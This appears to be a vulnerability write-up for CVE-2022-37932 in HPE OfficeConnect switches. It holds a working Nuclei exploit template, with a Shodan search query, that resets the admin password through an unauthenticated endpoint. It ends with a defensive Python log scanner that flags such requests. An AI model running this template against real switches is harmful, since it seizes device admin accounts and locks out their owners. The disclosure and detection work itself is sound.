A potential security vulnerability has been identified in Hewlett Packard Enterprise OfficeConnect 1820, 1850, and 1920S Network switches. The vulnerability could be remotely exploited to allow authentication bypass. HPE has made software updates available to resolve the vulnerability; affected are Hewlett Packard Enterprise OfficeConnect 1820, 1850 and 1920S Network switches running versions prior to PT.02.14, prior to PC.01.22, prior to PO.01.21, and prior to PD.02.22.
PoC code [publicly available]
id: CVE-2022-37932

info:
  name: HP Switch - Authentication Bypass
  author: Phulelouch
  severity: high
  description: |
    A potential security vulnerability has been identified in Hewlett Packard Enterprise OfficeConnect 1820, 1850, and 1920S Network switches. The vulnerability could be remotely exploited to allow authentication bypass. HPE has made the following software updates to resolve the vulnerability in Hewlett Packard Enterprise OfficeConnect 1820, 1850 and 1920S Network switches versions- Prior to PT.02.14; Prior to PC.01.22; Prior to PO.01.21; Prior to PD.02.22;
  classification:
    cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2022-37932
    epss-score: 0.7457
    epss-percentile: 0.98814
    cpe: cpe:2.3:o:hpe:officeconnect_1820_j9979a_firmware:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: hpe
    product: officeconnect_1820_j9979a_firmware
    shodan-query: html:"HPE OfficeConnect"
  tags: cve,cve2022,hp,officeconnect,auth-bypass,intrusive

variables:
  password: "{{rand_base(8)}}"

flow: http(1) && http(2) || http(3)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    redirects: true
    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - "contains(body, '<title>HPE OfficeConnect Switch 1920')"
        condition: and
        internal: true

  - raw:
      - |
        POST /login/default_password_cfg.lua HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        username=admin&oldPwd=&newPwd={{password}}&confirmPwd={{password}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "redirect")'
          - 'contains(content_type, "application/json")'
        condition: and

    extractors:
      - type: json
        name: redirect
        part: body
        json:
          - .redirect
        internal: true

      - type: dsl
        dsl:
          - '"Password:"+ password'
          - '"Login Path:"+ redirect'

  - raw:
      - |
        POST /htdocs/login/default_password_cfg.lua HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        username=admin&oldPwd=&newPwd={{password}}&confirmPwd={{password}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "redirect")'
          - 'contains(content_type, "application/json")'
        condition: and

    extractors:
      - type: json
        name: redirect
        part: body
        json:
          - .redirect
        internal: true

      - type: dsl
        dsl:
          - '"Password:"+ password'
          - '"Login Path:"+ redirect'
# digest: 4a0a004730450220389241cb163e302e9cc896c9b2afd22003d8afac57dcfb7b12d599e91bff6199022100a30397c7a651808af57c0ac423db8d8a35b79a561dea4a70eea2966e8c258013:922c64590222798bb761d5b6d8e72950
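
For defenders, the two request paths in the template are a concrete signal to hunt for. The following is an added example, not part of the original template or of HPE's advisory: it scans HTTP access logs for POSTs to default_password_cfg.lua from hosts outside an allowlist. It assumes a reverse proxy or HTTP-aware sensor in front of the switch management interface that logs in Combined Log Format; the function name, the admin_hosts parameter and the sample log lines are constructed for illustration.

```python
import re
from collections import defaultdict

# File name of the endpoint used in the template above; matching on the file
# name covers both the /login/ and the /htdocs/login/ variant.
ENDPOINT = "default_password_cfg.lua"

# Assumption: logs are in Combined Log Format, written by a reverse proxy or
# HTTP sensor in front of the switch management interface.
LINE_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)

def find_password_reset_hits(lines, admin_hosts=frozenset()):
    """Return {source IP: [(timestamp, path, status, verdict), ...]}."""
    hits = defaultdict(list)
    for line in lines:
        m = LINE_RE.match(line)
        if not m or m["method"] != "POST":
            continue  # malformed line, or not a state-changing request
        path = m["path"].split("?", 1)[0]
        if not path.endswith("/" + ENDPOINT):
            continue
        if m["src"] in admin_hosts:
            continue  # expected first-time setup from a management host
        # The template's matcher requires HTTP 200; the response body is not
        # in the log, so 200 is only a strong hint that the reset was accepted.
        verdict = "likely-success" if m["status"] == "200" else "attempt"
        hits[m["src"]].append((m["ts"], path, int(m["status"]), verdict))
    return dict(hits)

# Constructed sample log lines (documentation address ranges, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [12/Mar/2024:10:01:02 +0000] "GET / HTTP/1.1" 200 5120 "-" "-"',
    '192.0.2.10 - - [12/Mar/2024:10:01:03 +0000] "POST /login/default_password_cfg.lua HTTP/1.1" 200 64 "-" "-"',
    '198.51.100.7 - - [12/Mar/2024:10:05:40 +0000] "POST /htdocs/login/default_password_cfg.lua HTTP/1.1" 404 0 "-" "-"',
    '10.0.0.5 - - [12/Mar/2024:11:00:00 +0000] "POST /login/default_password_cfg.lua HTTP/1.1" 200 64 "-" "-"',
    '192.0.2.10 - - [12/Mar/2024:11:02:00 +0000] "GET /login/default_password_cfg.lua HTTP/1.1" 200 900 "-" "-"',
    'not an access log line',
]

if __name__ == "__main__":
    for src, events in find_password_reset_hits(SAMPLE_LOG, {"10.0.0.5"}).items():
        print(src, events)
```

A "likely-success" hit from a host that is not a known management station is a reason to check the switch's admin credentials and to confirm that the firmware is at or above the fixed version for its family.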